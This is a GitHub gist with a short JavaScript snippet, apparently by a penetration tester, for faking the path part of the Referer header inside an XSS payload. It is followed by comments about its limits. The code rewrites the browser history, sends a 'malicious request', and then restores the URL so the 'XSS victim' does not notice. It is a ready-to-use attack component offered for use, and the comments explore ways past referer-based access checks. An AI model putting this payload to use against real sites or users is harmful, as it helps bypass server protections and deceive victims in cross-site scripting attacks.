Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;
// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');
// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);
// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);
@hoodoer
Copy link
Author

hoodoer commented Oct 6, 2020

A blog walking through this in use can be found at:
https://www.trustedsec.com/blog/setting-the-referer-header-using-javascript/

@alkanna
Copy link

alkanna commented Feb 7, 2021

Hey @hoodoer, thanks for the great article. Is there a way to similarly modify the host part of the referer using javascript ?
There is a url I need to be able to access directly, however, the target host does not let me access it directly unless the referer is said host.

@hoodoer
Copy link
Author

hoodoer commented Feb 7, 2021

@alkanna I'm afraid not, just the relative path.

@hoodoer
Copy link
Author

hoodoer commented Feb 11, 2021

@alkanna, I wonder if you could create an iframe in the page you have running JavaScript, put the needed host into the iframe, and then make the request from that context? I haven't coded that up to try, but might be possible. Would be fun to play with for sure.

@iamajithkumar
Copy link

iamajithkumar commented Jun 7, 2021

Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

@hoodoer
Copy link
Author

hoodoer commented Jun 7, 2021

Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?

I'm afraid not, you can only control the relative path under the host.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment